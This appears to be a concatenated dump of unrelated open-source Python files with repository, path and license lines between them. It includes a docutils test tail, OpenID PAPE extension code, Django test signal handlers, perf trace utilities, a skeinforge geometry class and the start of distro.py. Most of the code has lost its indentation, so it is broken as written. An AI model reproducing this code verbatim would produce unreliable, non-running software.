<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="section">
Section
<section ids="section" names="section">
<title refid="contents">
Section
<paragraph>
Paragraph.
"""],
["""\
.. contents::
:backlinks: none
Section
--------
Paragraph.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="section">
Section
<section ids="section" names="section">
<title>
Section
<paragraph>
Paragraph.
"""],
["""\
.. contents::
Degenerate case, no table of contents generated.
""",
"""\
<document source="test data">
<paragraph>
Degenerate case, no table of contents generated.
"""],
["""\
Title 1
=======
Paragraph 1.
.. sidebar:: Contents
.. contents::
:local:
Title 2
-------
Paragraph 2.
Title 3
```````
Paragraph 3.
""",
"""\
<document source="test data">
<section ids="title-1" names="title\ 1">
<title>
Title 1
<paragraph>
Paragraph 1.
<sidebar>
<title>
Contents
<topic classes="contents local" ids="contents" names="contents">
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-2">
Title 2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-3">
Title 3
<section ids="title-2" names="title\ 2">
<title refid="id1">
Title 2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title refid="id2">
Title 3
<paragraph>
Paragraph 3.
"""],
])
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
|
agpl-3.0
|
zorroz/microblog
|
flask/lib/python2.7/site-packages/openid/extensions/draft/pape2.py
|
156
|
9330
|
"""An implementation of the OpenID Provider Authentication Policy
Extension 1.0
@see: http://openid.net/developers/specs/
@since: 2.1.0
"""
__all__ = [
'Request',
'Response',
'ns_uri',
'AUTH_PHISHING_RESISTANT',
'AUTH_MULTI_FACTOR',
'AUTH_MULTI_FACTOR_PHYSICAL',
]
from openid.extension import Extension
import re
ns_uri = "http://specs.openid.net/extensions/pape/1.0"
AUTH_MULTI_FACTOR_PHYSICAL = \
'http://schemas.openid.net/pape/policies/2007/06/multi-factor-physical'
AUTH_MULTI_FACTOR = \
'http://schemas.openid.net/pape/policies/2007/06/multi-factor'
AUTH_PHISHING_RESISTANT = \
'http://schemas.openid.net/pape/policies/2007/06/phishing-resistant'
TIME_VALIDATOR = re.compile('^\d\d\d\d-\d\d-\d\dT\d\d:\d\d:\d\dZ$')
class Request(Extension):
"""A Provider Authentication Policy request, sent from a relying
party to a provider
@ivar preferred_auth_policies: The authentication policies that
the relying party prefers
@type preferred_auth_policies: [str]
@ivar max_auth_age: The maximum time, in seconds, that the relying
party wants to allow to have elapsed before the user must
re-authenticate
@type max_auth_age: int or NoneType
"""
ns_alias = 'pape'
def __init__(self, preferred_auth_policies=None, max_auth_age=None):
super(Request, self).__init__()
if not preferred_auth_policies:
preferred_auth_policies = []
self.preferred_auth_policies = preferred_auth_policies
self.max_auth_age = max_auth_age
def __nonzero__(self):
return bool(self.preferred_auth_policies or
self.max_auth_age is not None)
def addPolicyURI(self, policy_uri):
"""Add an acceptable authentication policy URI to this request
This method is intended to be used by the relying party to add
acceptable authentication types to the request.
@param policy_uri: The identifier for the preferred type of
authentication.
@see: http://openid.net/specs/openid-provider-authentication-policy-extension-1_0-01.html#auth_policies
"""
if policy_uri not in self.preferred_auth_policies:
self.preferred_auth_policies.append(policy_uri)
def getExtensionArgs(self):
"""@see: C{L{Extension.getExtensionArgs}}
"""
ns_args = {
'preferred_auth_policies':' '.join(self.preferred_auth_policies)
}
if self.max_auth_age is not None:
ns_args['max_auth_age'] = str(self.max_auth_age)
return ns_args
def fromOpenIDRequest(cls, request):
"""Instantiate a Request object from the arguments in a
C{checkid_*} OpenID message
"""
self = cls()
args = request.message.getArgs(self.ns_uri)
if args == {}:
return None
self.parseExtensionArgs(args)
return self
fromOpenIDRequest = classmethod(fromOpenIDRequest)
def parseExtensionArgs(self, args):
"""Set the state of this request to be that expressed in these
PAPE arguments
@param args: The PAPE arguments without a namespace
@rtype: None
@raises ValueError: When the max_auth_age is not parseable as
an integer
"""
# preferred_auth_policies is a space-separated list of policy URIs
self.preferred_auth_policies = []
policies_str = args.get('preferred_auth_policies')
if policies_str:
for uri in policies_str.split(' '):
if uri not in self.preferred_auth_policies:
self.preferred_auth_policies.append(uri)
# max_auth_age is base-10 integer number of seconds
max_auth_age_str = args.get('max_auth_age')
self.max_auth_age = None
if max_auth_age_str:
try:
self.max_auth_age = int(max_auth_age_str)
except ValueError:
pass
def preferredTypes(self, supported_types):
"""Given a list of authentication policy URIs that a provider
supports, this method returns the subsequence of those types
that are preferred by the relying party.
@param supported_types: A sequence of authentication policy
type URIs that are supported by a provider
@returns: The sub-sequence of the supported types that are
preferred by the relying party. This list will be ordered
in the order that the types appear in the supported_types
sequence, and may be empty if the provider does not prefer
any of the supported authentication types.
@returntype: [str]
"""
return filter(self.preferred_auth_policies.__contains__,
supported_types)
Request.ns_uri = ns_uri
class Response(Extension):
"""A Provider Authentication Policy response, sent from a provider
to a relying party
"""
ns_alias = 'pape'
def __init__(self, auth_policies=None, auth_time=None,
nist_auth_level=None):
super(Response, self).__init__()
if auth_policies:
self.auth_policies = auth_policies
else:
self.auth_policies = []
self.auth_time = auth_time
self.nist_auth_level = nist_auth_level
def addPolicyURI(self, policy_uri):
"""Add a authentication policy to this response
This method is intended to be used by the provider to add a
policy that the provider conformed to when authenticating the user.
@param policy_uri: The identifier for the preferred type of
authentication.
@see: http://openid.net/specs/openid-provider-authentication-policy-extension-1_0-01.html#auth_policies
"""
if policy_uri not in self.auth_policies:
self.auth_policies.append(policy_uri)
def fromSuccessResponse(cls, success_response):
"""Create a C{L{Response}} object from a successful OpenID
library response
(C{L{openid.consumer.consumer.SuccessResponse}}) response
message
@param success_response: A SuccessResponse from consumer.complete()
@type success_response: C{L{openid.consumer.consumer.SuccessResponse}}
@rtype: Response or None
@returns: A provider authentication policy response from the
data that was supplied with the C{id_res} response or None
if the provider sent no signed PAPE response arguments.
"""
self = cls()
# PAPE requires that the args be signed.
args = success_response.getSignedNS(self.ns_uri)
# Only try to construct a PAPE response if the arguments were
# signed in the OpenID response. If not, return None.
if args is not None:
self.parseExtensionArgs(args)
return self
else:
return None
def parseExtensionArgs(self, args, strict=False):
"""Parse the provider authentication policy arguments into the
internal state of this object
@param args: unqualified provider authentication policy
arguments
@param strict: Whether to raise an exception when bad data is
encountered
@returns: None. The data is parsed into the internal fields of
this object.
"""
policies_str = args.get('auth_policies')
if policies_str and policies_str != 'none':
self.auth_policies = policies_str.split(' ')
nist_level_str = args.get('nist_auth_level')
if nist_level_str:
try:
nist_level = int(nist_level_str)
except ValueError:
if strict:
raise ValueError('nist_auth_level must be an integer between '
'zero and four, inclusive')
else:
self.nist_auth_level = None
else:
if 0 <= nist_level < 5:
self.nist_auth_level = nist_level
auth_time = args.get('auth_time')
if auth_time:
if TIME_VALIDATOR.match(auth_time):
self.auth_time = auth_time
elif strict:
raise ValueError("auth_time must be in RFC3339 format")
fromSuccessResponse = classmethod(fromSuccessResponse)
def getExtensionArgs(self):
"""@see: C{L{Extension.getExtensionArgs}}
"""
if len(self.auth_policies) == 0:
ns_args = {
'auth_policies':'none',
}
else:
ns_args = {
'auth_policies':' '.join(self.auth_policies),
}
if self.nist_auth_level is not None:
if self.nist_auth_level not in range(0, 5):
raise ValueError('nist_auth_level must be an integer between '
'zero and four, inclusive')
ns_args['nist_auth_level'] = str(self.nist_auth_level)
if self.auth_time is not None:
if not TIME_VALIDATOR.match(self.auth_time):
raise ValueError('auth_time must be in RFC3339 format')
ns_args['auth_time'] = self.auth_time
return ns_args
Response.ns_uri = ns_uri
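# Editor's sketch of typical use (illustrative only; ``auth_request`` and
# ``success_response`` come from the openid consumer API and are assumed):
#
#     pape_request = Request(max_auth_age=3600)
#     pape_request.addPolicyURI(AUTH_PHISHING_RESISTANT)
#     auth_request.addExtension(pape_request)
#
#     pape_response = Response.fromSuccessResponse(success_response)
#     if pape_response and AUTH_PHISHING_RESISTANT in pape_response.auth_policies:
#         pass  # the provider claims a phishing-resistant method was used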
|
bsd-3-clause
|
BassantMorsi/finderApp
|
lib/python2.7/site-packages/django/test/signals.py
|
45
|
6752
|
import os
import threading
import time
import warnings
from django.apps import apps
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.db import connections, router
from django.db.utils import ConnectionRouter
from django.dispatch import Signal, receiver
from django.utils import six, timezone
from django.utils.formats import FORMAT_SETTINGS, reset_format_cache
from django.utils.functional import empty
template_rendered = Signal(providing_args=["template", "context"])
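# Editor's sketch: a receiver hooked to this signal (the test client collects
# rendered templates in a similar way); ``rendered_templates`` is illustrative.
#
#   @receiver(template_rendered)
#   def _record_render(sender, template=None, context=None, **kwargs):
#       rendered_templates.append(template)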
# Most setting_changed receivers are supposed to be added below,
# except for cases where the receiver is related to a contrib app.
# Settings that may not work well when using 'override_settings' (#19031)
COMPLEX_OVERRIDE_SETTINGS = {'DATABASES'}
@receiver(setting_changed)
def clear_cache_handlers(**kwargs):
if kwargs['setting'] == 'CACHES':
from django.core.cache import caches
caches._caches = threading.local()
@receiver(setting_changed)
def update_installed_apps(**kwargs):
if kwargs['setting'] == 'INSTALLED_APPS':
# Rebuild any AppDirectoriesFinder instance.
from django.contrib.staticfiles.finders import get_finder
get_finder.cache_clear()
# Rebuild management commands cache
from django.core.management import get_commands
get_commands.cache_clear()
# Rebuild get_app_template_dirs cache.
from django.template.utils import get_app_template_dirs
get_app_template_dirs.cache_clear()
# Rebuild translations cache.
from django.utils.translation import trans_real
trans_real._translations = {}
@receiver(setting_changed)
def update_connections_time_zone(**kwargs):
if kwargs['setting'] == 'TIME_ZONE':
# Reset process time zone
if hasattr(time, 'tzset'):
if kwargs['value']:
os.environ['TZ'] = kwargs['value']
else:
os.environ.pop('TZ', None)
time.tzset()
# Reset local time zone cache
timezone.get_default_timezone.cache_clear()
# Reset the database connections' time zone
if kwargs['setting'] in {'TIME_ZONE', 'USE_TZ'}:
for conn in connections.all():
try:
del conn.timezone
except AttributeError:
pass
try:
del conn.timezone_name
except AttributeError:
pass
conn.ensure_timezone()
@receiver(setting_changed)
def clear_routers_cache(**kwargs):
if kwargs['setting'] == 'DATABASE_ROUTERS':
router.routers = ConnectionRouter().routers
@receiver(setting_changed)
def reset_template_engines(**kwargs):
if kwargs['setting'] in {
'TEMPLATES',
'DEBUG',
'FILE_CHARSET',
'INSTALLED_APPS',
}:
from django.template import engines
try:
del engines.templates
except AttributeError:
pass
engines._templates = None
engines._engines = {}
from django.template.engine import Engine
Engine.get_default.cache_clear()
from django.forms.renderers import get_default_renderer
get_default_renderer.cache_clear()
@receiver(setting_changed)
def clear_serializers_cache(**kwargs):
if kwargs['setting'] == 'SERIALIZATION_MODULES':
from django.core import serializers
serializers._serializers = {}
@receiver(setting_changed)
def language_changed(**kwargs):
if kwargs['setting'] in {'LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS'}:
from django.utils.translation import trans_real
trans_real._default = None
trans_real._active = threading.local()
if kwargs['setting'] in {'LANGUAGES', 'LOCALE_PATHS'}:
from django.utils.translation import trans_real
trans_real._translations = {}
trans_real.check_for_language.cache_clear()
@receiver(setting_changed)
def localize_settings_changed(**kwargs):
if kwargs['setting'] in FORMAT_SETTINGS or kwargs['setting'] == 'USE_THOUSAND_SEPARATOR':
reset_format_cache()
@receiver(setting_changed)
def file_storage_changed(**kwargs):
if kwargs['setting'] == 'DEFAULT_FILE_STORAGE':
from django.core.files.storage import default_storage
default_storage._wrapped = empty
@receiver(setting_changed)
def complex_setting_changed(**kwargs):
if kwargs['enter'] and kwargs['setting'] in COMPLEX_OVERRIDE_SETTINGS:
# Considering the current implementation of the signals framework,
# this stacklevel shows the line containing the override_settings call.
warnings.warn("Overriding setting %s can lead to unexpected behavior."
% kwargs['setting'], stacklevel=5 if six.PY2 else 6)
@receiver(setting_changed)
def root_urlconf_changed(**kwargs):
if kwargs['setting'] == 'ROOT_URLCONF':
from django.urls import clear_url_caches, set_urlconf
clear_url_caches()
set_urlconf(None)
@receiver(setting_changed)
def static_storage_changed(**kwargs):
if kwargs['setting'] in {
'STATICFILES_STORAGE',
'STATIC_ROOT',
'STATIC_URL',
}:
from django.contrib.staticfiles.storage import staticfiles_storage
staticfiles_storage._wrapped = empty
@receiver(setting_changed)
def static_finders_changed(**kwargs):
if kwargs['setting'] in {
'STATICFILES_DIRS',
'STATIC_ROOT',
}:
from django.contrib.staticfiles.finders import get_finder
get_finder.cache_clear()
@receiver(setting_changed)
def auth_password_validators_changed(**kwargs):
if kwargs['setting'] == 'AUTH_PASSWORD_VALIDATORS':
from django.contrib.auth.password_validation import get_default_password_validators
get_default_password_validators.cache_clear()
@receiver(setting_changed)
def user_model_swapped(**kwargs):
if kwargs['setting'] == 'AUTH_USER_MODEL':
apps.clear_cache()
try:
from django.contrib.auth import get_user_model
UserModel = get_user_model()
except ImproperlyConfigured:
# Some tests set an invalid AUTH_USER_MODEL.
pass
else:
from django.contrib.auth import backends
backends.UserModel = UserModel
from django.contrib.auth import forms
forms.UserModel = UserModel
from django.contrib.auth.handlers import modwsgi
modwsgi.UserModel = UserModel
from django.contrib.auth.management.commands import changepassword
changepassword.UserModel = UserModel
from django.contrib.auth import views
views.UserModel = UserModel
|
mit
|
Krabappel2548/kernel_msm8x60
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py
|
12527
|
1935
|
# Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
    str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs))
    return str
def add_stats(dict, key, value):
    if not dict.has_key(key):
        dict[key] = (value, value, value, 1)
    else:
        min, max, avg, count = dict[key]
        if value < min:
            min = value
        if value > max:
            max = value
        # maintain a true running mean across all samples
        avg = (avg * count + value) / (count + 1)
        dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
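# Editor's sketch: typical use from a perf script event handler (the event
# name and its leading arguments are hypothetical):
#
#   stats = {}
#   def sched__sched_wakeup(event_name, context, common_cpu,
#                           common_secs, common_nsecs, *args):
#       add_stats(stats, "wakeup", nsecs(common_secs, common_nsecs))
#
# After processing, stats["wakeup"] holds (min, max, avg, count) and the
# average can be printed with nsecs_str(avg).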
|
gpl-2.0
|
Pointedstick/ReplicatorG
|
skein_engines/skeinforge-40/fabmetheus_utilities/geometry/geometry_tools/dictionary.py
|
2
|
5368
|
"""
Boolean geometry dictionary object.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.geometry.geometry_utilities import evaluate
from fabmetheus_utilities.geometry.geometry_utilities import matrix
from fabmetheus_utilities import euclidean
from fabmetheus_utilities import xml_simple_writer
import cStringIO
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__credits__ = 'Nophead <http://hydraraptor.blogspot.com/>\nArt of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getAllPaths(paths, xmlObject):
'Get all paths.'
for archivableObject in xmlObject.archivableObjects:
paths += archivableObject.getPaths()
return paths
def getAllTransformedPaths(transformedPaths, xmlObject):
'Get all transformed paths.'
for archivableObject in xmlObject.archivableObjects:
transformedPaths += archivableObject.getTransformedPaths()
return transformedPaths
def getAllTransformedVertexes(transformedVertexes, xmlObject):
'Get all transformed vertexes.'
for archivableObject in xmlObject.archivableObjects:
transformedVertexes += archivableObject.getTransformedVertexes()
return transformedVertexes
def getAllVertexes(vertexes, xmlObject):
'Get all vertexes.'
for archivableObject in xmlObject.archivableObjects:
vertexes += archivableObject.getVertexes()
return vertexes
def processXMLElement(xmlElement):
'Process the xml element.'
evaluate.processArchivable( Dictionary, xmlElement)
class Dictionary:
'A dictionary object.'
def __init__(self):
'Add empty lists.'
self.archivableObjects = []
self.xmlElement = None
def __repr__(self):
'Get the string representation of this object info.'
output = xml_simple_writer.getBeginGeometryXMLOutput(self.xmlElement)
self.addXML( 1, output )
return xml_simple_writer.getEndGeometryXMLString(output)
def addXML(self, depth, output):
'Add xml for this object.'
attributeCopy = {}
if self.xmlElement != None:
attributeCopy = evaluate.getEvaluatedDictionaryByCopyKeys(['paths', 'target', 'vertexes'], self.xmlElement)
euclidean.removeElementsFromDictionary(attributeCopy, matrix.getKeysM())
euclidean.removeTrueFromDictionary(attributeCopy, 'visible')
innerOutput = cStringIO.StringIO()
self.addXMLInnerSection(depth + 1, innerOutput)
self.addXMLArchivableObjects(depth + 1, innerOutput)
xml_simple_writer.addBeginEndInnerXMLTag(attributeCopy, self.getXMLClassName(), depth, innerOutput.getvalue(), output)
def addXMLArchivableObjects(self, depth, output):
'Add xml for this object.'
xml_simple_writer.addXMLFromObjects( depth, self.archivableObjects, output )
def addXMLInnerSection(self, depth, output):
'Add xml section for this object.'
pass
def createShape(self):
'Create the shape.'
pass
def getAttributeDictionary(self):
'Get attribute table.'
if self.xmlElement == None:
return {}
return self.xmlElement.attributeDictionary
def getComplexTransformedPathLists(self):
'Get complex transformed path lists.'
complexTransformedPathLists = []
for archivableObject in self.archivableObjects:
complexTransformedPathLists.append(euclidean.getComplexPaths(archivableObject.getTransformedPaths()))
return complexTransformedPathLists
def getFabricationExtension(self):
'Get fabrication extension.'
return 'xml'
def getFabricationText(self, addLayerTemplate):
'Get fabrication text.'
return self.__repr__()
def getGeometryOutput(self):
'Get geometry output dictionary.'
visibleObjects = evaluate.getVisibleObjects(self.archivableObjects)
shapeOutput = []
for visibleObject in visibleObjects:
visibleObjectOutput = visibleObject.getGeometryOutput()
if visibleObjectOutput != None:
shapeOutput.append(visibleObjectOutput)
if len(shapeOutput) < 1:
return None
return {self.getXMLClassName() : {'shapes' : shapeOutput}}
def getMatrix4X4(self):
"Get the matrix4X4."
return None
def getMatrixChainTetragrid(self):
'Get the matrix chain tetragrid.'
return self.xmlElement.parent.xmlObject.getMatrixChainTetragrid()
def getMinimumZ(self):
'Get the minimum z.'
return None
def getPaths(self):
'Get all paths.'
return getAllPaths([], self)
def getTransformedPaths(self):
'Get all transformed paths.'
return getAllTransformedPaths([], self)
def getTransformedVertexes(self):
'Get all transformed vertexes.'
return getAllTransformedVertexes([], self)
def getTriangleMeshes(self):
'Get all triangleMeshes.'
triangleMeshes = []
for archivableObject in self.archivableObjects:
triangleMeshes += archivableObject.getTriangleMeshes()
return triangleMeshes
def getType(self):
'Get type.'
return self.__class__.__name__
def getVertexes(self):
'Get all vertexes.'
return getAllVertexes([], self)
def getVisible(self):
'Get visible.'
return False
def getXMLClassName(self):
'Get xml class name.'
return self.__class__.__name__.lower()
def setToXMLElement(self, xmlElement):
'Set the shape of this carvable object info.'
self.xmlElement = xmlElement
xmlElement.parent.xmlObject.archivableObjects.append(self)
|
gpl-2.0
|
kenshay/ImageScripter
|
ProgramData/SystemFiles/Python/Lib/site-packages/pip-9.0.1-py2.7.egg/pip/_vendor/distro.py
|
330
|
38349
|
# Copyright 2015,2016 Nir Cohen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The ``distro`` package (``distro`` stands for Linux Distribution) provides
information about the Linux distribution it runs on, such as a reliable
machine-readable distro ID, or version information.
It is a renewed alternative implementation for Python's original
:py:func:`platform.linux_distribution` function, but it provides much more
functionality. An alternative implementation became necessary because Python
3.5 deprecated this function, and Python 3.7 is expected to remove it
altogether. Its predecessor function :py:func:`platform.dist` was already
deprecated since Python 2.6 and is also expected to be removed in Python 3.7.
Still, there are many cases in which access to Linux distribution information
is needed. See `Python issue 1322 <https://bugs.python.org/issue1322>`_ for
more information.
"""
import os
import re
import sys
import json
import shlex
import logging
import subprocess
if not sys.platform.startswith('linux'):
raise ImportError('Unsupported platform: {0}'.format(sys.platform))
_UNIXCONFDIR = '/etc'
_OS_RELEASE_BASENAME = 'os-release'
#: Translation table for normalizing the "ID" attribute defined in os-release
#: files, for use by the :func:`distro.id` method.
#:
#: * Key: Value as defined in the os-release file, translated to lower case,
#: with blanks translated to underscores.
#:
#: * Value: Normalized value.
NORMALIZED_OS_ID = {}
#: Translation table for normalizing the "Distributor ID" attribute returned by
#: the lsb_release command, for use by the :func:`distro.id` method.
#:
#: * Key: Value as returned by the lsb_release command, translated to lower
#: case, with blanks translated to underscores.
#:
#: * Value: Normalized value.
NORMALIZED_LSB_ID = {
'enterpriseenterprise': 'oracle', # Oracle Enterprise Linux
'redhatenterpriseworkstation': 'rhel', # RHEL 6.7
}
#: Translation table for normalizing the distro ID derived from the file name
#: of distro release files, for use by the :func:`distro.id` method.
#:
#: * Key: Value as derived from the file name of a distro release file,
#: translated to lower case, with blanks translated to underscores.
#:
#: * Value: Normalized value.
NORMALIZED_DISTRO_ID = {
'redhat': 'rhel', # RHEL 6.x, 7.x
}
# Pattern for content of distro release file (reversed)
_DISTRO_RELEASE_CONTENT_REVERSED_PATTERN = re.compile(
r'(?:[^)]*\)(.*)\()? *(?:STL )?([\d.+\-a-z]*\d) *(?:esaeler *)?(.+)')
# Pattern for base file name of distro release file
_DISTRO_RELEASE_BASENAME_PATTERN = re.compile(
r'(\w+)[-_](release|version)$')
# Base file names to be ignored when searching for distro release file
_DISTRO_RELEASE_IGNORE_BASENAMES = (
'debian_version',
'lsb-release',
'oem-release',
_OS_RELEASE_BASENAME,
'system-release'
)
def linux_distribution(full_distribution_name=True):
"""
Return information about the current Linux distribution as a tuple
``(id_name, version, codename)`` with items as follows:
* ``id_name``: If *full_distribution_name* is false, the result of
:func:`distro.id`. Otherwise, the result of :func:`distro.name`.
* ``version``: The result of :func:`distro.version`.
* ``codename``: The result of :func:`distro.codename`.
The interface of this function is compatible with the original
:py:func:`platform.linux_distribution` function, supporting a subset of
its parameters.
The data it returns may not exactly be the same, because it uses more data
sources than the original function, and that may lead to different data if
the Linux distribution is not consistent across multiple data sources it
provides (there are indeed such distributions ...).
Another reason for differences is the fact that the :func:`distro.id`
method normalizes the distro ID string to a reliable machine-readable value
for a number of popular Linux distributions.
"""
return _distro.linux_distribution(full_distribution_name)
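# Editor's sketch (example values only; actual output depends on the host):
#
#   >>> import distro
#   >>> distro.linux_distribution(full_distribution_name=False)
#   ('centos', '7.1.1503', 'Core')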
def id():
"""
Return the distro ID of the current Linux distribution, as a
machine-readable string.
For a number of Linux distributions, the returned distro ID value is
*reliable*, in the sense that it is documented and that it does not change
across releases of the distribution.
This package maintains the following reliable distro ID values:
    ============== =========================================
    Distro ID      Distribution
    ============== =========================================
    "ubuntu"       Ubuntu
    "debian"       Debian
    "rhel"         Red Hat Enterprise Linux
    "centos"       CentOS
    "fedora"       Fedora
    "sles"         SUSE Linux Enterprise Server
    "opensuse"     openSUSE
    "amazon"       Amazon Linux
    "arch"         Arch Linux
    "cloudlinux"   CloudLinux OS
    "exherbo"      Exherbo Linux
    "gentoo"       Gentoo Linux
    "ibm_powerkvm" IBM PowerKVM
    "kvmibm"       KVM for IBM z Systems
    "linuxmint"    Linux Mint
    "mageia"       Mageia
    "mandriva"     Mandriva Linux
    "parallels"    Parallels
    "pidora"       Pidora
    "raspbian"     Raspbian
    "oracle"       Oracle Linux (and Oracle Enterprise Linux)
    "scientific"   Scientific Linux
    "slackware"    Slackware
    "xenserver"    XenServer
    ============== =========================================
If you have a need to get distros for reliable IDs added into this set,
or if you find that the :func:`distro.id` function returns a different
distro ID for one of the listed distros, please create an issue in the
`distro issue tracker`_.
**Lookup hierarchy and transformations:**
First, the ID is obtained from the following sources, in the specified
order. The first available and non-empty value is used:
* the value of the "ID" attribute of the os-release file,
* the value of the "Distributor ID" attribute returned by the lsb_release
command,
* the first part of the file name of the distro release file,
The so determined ID value then passes the following transformations,
before it is returned by this method:
* it is translated to lower case,
* blanks (which should not be there anyway) are translated to underscores,
* a normalization of the ID is performed, based upon
`normalization tables`_. The purpose of this normalization is to ensure
that the ID is as reliable as possible, even across incompatible changes
in the Linux distributions. A common reason for an incompatible change is
the addition of an os-release file, or the addition of the lsb_release
command, with ID values that differ from what was previously determined
from the distro release file name.
"""
return _distro.id()
def name(pretty=False):
"""
Return the name of the current Linux distribution, as a human-readable
string.
If *pretty* is false, the name is returned without version or codename.
(e.g. "CentOS Linux")
If *pretty* is true, the version and codename are appended.
(e.g. "CentOS Linux 7.1.1503 (Core)")
**Lookup hierarchy:**
The name is obtained from the following sources, in the specified order.
The first available and non-empty value is used:
* If *pretty* is false:
- the value of the "NAME" attribute of the os-release file,
- the value of the "Distributor ID" attribute returned by the lsb_release
command,
- the value of the "<name>" field of the distro release file.
* If *pretty* is true:
- the value of the "PRETTY_NAME" attribute of the os-release file,
- the value of the "Description" attribute returned by the lsb_release
command,
- the value of the "<name>" field of the distro release file, appended
with the value of the pretty version ("<version_id>" and "<codename>"
fields) of the distro release file, if available.
"""
return _distro.name(pretty)
def version(pretty=False, best=False):
"""
Return the version of the current Linux distribution, as a human-readable
string.
If *pretty* is false, the version is returned without codename (e.g.
"7.0").
If *pretty* is true, the codename in parenthesis is appended, if the
codename is non-empty (e.g. "7.0 (Maipo)").
Some distributions provide version numbers with different precisions in
the different sources of distribution information. Examining the different
sources in a fixed priority order does not always yield the most precise
version (e.g. for Debian 8.2, or CentOS 7.1).
The *best* parameter can be used to control the approach for the returned
version:
If *best* is false, the first non-empty version number in priority order of
the examined sources is returned.
If *best* is true, the most precise version number out of all examined
sources is returned.
**Lookup hierarchy:**
In all cases, the version number is obtained from the following sources.
If *best* is false, this order represents the priority order:
* the value of the "VERSION_ID" attribute of the os-release file,
* the value of the "Release" attribute returned by the lsb_release
command,
* the version number parsed from the "<version_id>" field of the first line
of the distro release file,
* the version number parsed from the "PRETTY_NAME" attribute of the
os-release file, if it follows the format of the distro release files.
* the version number parsed from the "Description" attribute returned by
the lsb_release command, if it follows the format of the distro release
files.
"""
return _distro.version(pretty, best)
def version_parts(best=False):
"""
Return the version of the current Linux distribution as a tuple
``(major, minor, build_number)`` with items as follows:
* ``major``: The result of :func:`distro.major_version`.
* ``minor``: The result of :func:`distro.minor_version`.
* ``build_number``: The result of :func:`distro.build_number`.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.version_parts(best)
def major_version(best=False):
"""
Return the major version of the current Linux distribution, as a string,
if provided.
Otherwise, the empty string is returned. The major version is the first
part of the dot-separated version string.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.major_version(best)
def minor_version(best=False):
"""
Return the minor version of the current Linux distribution, as a string,
if provided.
Otherwise, the empty string is returned. The minor version is the second
part of the dot-separated version string.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.minor_version(best)
def build_number(best=False):
"""
Return the build number of the current Linux distribution, as a string,
if provided.
Otherwise, the empty string is returned. The build number is the third part
of the dot-separated version string.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.build_number(best)
def like():
"""
Return a space-separated list of distro IDs of distributions that are
closely related to the current Linux distribution in regards to packaging
and programming interfaces, for example distributions the current
distribution is a derivative from.
**Lookup hierarchy:**
This information item is only provided by the os-release file.
For details, see the description of the "ID_LIKE" attribute in the
`os-release man page
<http://www.freedesktop.org/software/systemd/man/os-release.html>`_.
"""
return _distro.like()
def codename():
"""
Return the codename for the release of the current Linux distribution,
as a string.
If the distribution does not have a codename, an empty string is returned.
Note that the returned codename is not always really a codename. For
example, openSUSE returns "x86_64". This function does not handle such
cases in any special way and just returns the string it finds, if any.
**Lookup hierarchy:**
* the codename within the "VERSION" attribute of the os-release file, if
provided,
* the value of the "Codename" attribute returned by the lsb_release
command,
* the value of the "<codename>" field of the distro release file.
"""
return _distro.codename()
def info(pretty=False, best=False):
"""
Return certain machine-readable information items about the current Linux
distribution in a dictionary, as shown in the following example:
.. sourcecode:: python
{
'id': 'rhel',
'version': '7.0',
'version_parts': {
'major': '7',
'minor': '0',
'build_number': ''
